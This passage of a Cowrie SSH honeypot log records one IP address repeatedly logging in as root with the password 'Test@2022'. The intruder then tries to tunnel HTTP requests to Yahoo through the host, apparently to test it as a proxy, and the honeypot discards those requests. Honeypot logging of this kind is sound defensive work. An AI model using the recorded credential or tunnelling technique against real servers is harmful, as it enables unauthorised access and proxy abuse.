57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.355300Z","src_ip":"213.209.150.239","session":"dec1b6e5d210"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.589407Z","src_ip":"213.209.150.239","session":"dec1b6e5d210"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":16415,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16415","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.638111Z","session":"dec1b6e5d210"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.685651Z","src_ip":"213.209.150.239","session":"dec1b6e5d210"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11832,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11832","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.821421Z","session":"dec1b6e5d210"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.868498Z","src_ip":"213.209.150.239","session":"dec1b6e5d210"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.916248Z","src_ip":"213.209.150.239","session":"dec1b6e5d210"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17276,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5a156b67d60","protocol":"ssh","message":"New connection: 213.209.150.239:17276 (1.2.3.4:22) [session: a5a156b67d60]","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.962714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.963653Z","src_ip":"213.209.150.239","session":"a5a156b67d60"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.011018Z","src_ip":"213.209.150.239","session":"a5a156b67d60"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.245358Z","src_ip":"213.209.150.239","session":"a5a156b67d60"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":21547,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:21547","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.293618Z","session":"a5a156b67d60"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.341988Z","src_ip":"213.209.150.239","session":"a5a156b67d60"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25991,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25991","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.477499Z","session":"a5a156b67d60"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.524804Z","src_ip":"213.209.150.239","session":"a5a156b67d60"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.572647Z","src_ip":"213.209.150.239","session":"a5a156b67d60"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17316,"dst_ip":"1.2.3.4","dst_port":22,"session":"54414101f174","protocol":"ssh","message":"New connection: 213.209.150.239:17316 (1.2.3.4:22) [session: 54414101f174]","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.618914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.628726Z","src_ip":"213.209.150.239","session":"54414101f174"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.666527Z","src_ip":"213.209.150.239","session":"54414101f174"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.903107Z","src_ip":"213.209.150.239","session":"54414101f174"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15584,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15584","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.951551Z","session":"54414101f174"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:12.998813Z","src_ip":"213.209.150.239","session":"54414101f174"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":1909,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1909","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.141588Z","session":"54414101f174"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.188797Z","src_ip":"213.209.150.239","session":"54414101f174"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.237821Z","src_ip":"213.209.150.239","session":"54414101f174"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17365,"dst_ip":"1.2.3.4","dst_port":22,"session":"dec7b18199e1","protocol":"ssh","message":"New connection: 213.209.150.239:17365 (1.2.3.4:22) [session: dec7b18199e1]","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.293305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.294961Z","src_ip":"213.209.150.239","session":"dec7b18199e1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.351684Z","src_ip":"213.209.150.239","session":"dec7b18199e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.633946Z","src_ip":"213.209.150.239","session":"dec7b18199e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":27433,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27433","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.691745Z","session":"dec7b18199e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.748386Z","src_ip":"213.209.150.239","session":"dec7b18199e1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24926,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24926","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.902983Z","session":"dec7b18199e1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:13.959626Z","src_ip":"213.209.150.239","session":"dec7b18199e1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.017021Z","src_ip":"213.209.150.239","session":"dec7b18199e1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17418,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6d92e9db760","protocol":"ssh","message":"New connection: 213.209.150.239:17418 (1.2.3.4:22) [session: f6d92e9db760]","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.063045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.064014Z","src_ip":"213.209.150.239","session":"f6d92e9db760"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.111246Z","src_ip":"213.209.150.239","session":"f6d92e9db760"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.346010Z","src_ip":"213.209.150.239","session":"f6d92e9db760"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":5473,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5473","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.394470Z","session":"f6d92e9db760"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.441591Z","src_ip":"213.209.150.239","session":"f6d92e9db760"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":19344,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19344","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.577504Z","session":"f6d92e9db760"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.625172Z","src_ip":"213.209.150.239","session":"f6d92e9db760"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.673200Z","src_ip":"213.209.150.239","session":"f6d92e9db760"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17460,"dst_ip":"1.2.3.4","dst_port":22,"session":"305ec87e3c9e","protocol":"ssh","message":"New connection: 213.209.150.239:17460 (1.2.3.4:22) [session: 305ec87e3c9e]","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.719486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.720634Z","src_ip":"213.209.150.239","session":"305ec87e3c9e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:14.767879Z","src_ip":"213.209.150.239","session":"305ec87e3c9e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.003050Z","src_ip":"213.209.150.239","session":"305ec87e3c9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":15973,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15973","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.051438Z","session":"305ec87e3c9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.098835Z","src_ip":"213.209.150.239","session":"305ec87e3c9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2303,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2303","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.233502Z","session":"305ec87e3c9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.280712Z","src_ip":"213.209.150.239","session":"305ec87e3c9e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.328965Z","src_ip":"213.209.150.239","session":"305ec87e3c9e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17511,"dst_ip":"1.2.3.4","dst_port":22,"session":"981dd2bcb75e","protocol":"ssh","message":"New connection: 213.209.150.239:17511 (1.2.3.4:22) [session: 981dd2bcb75e]","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.384758Z"}
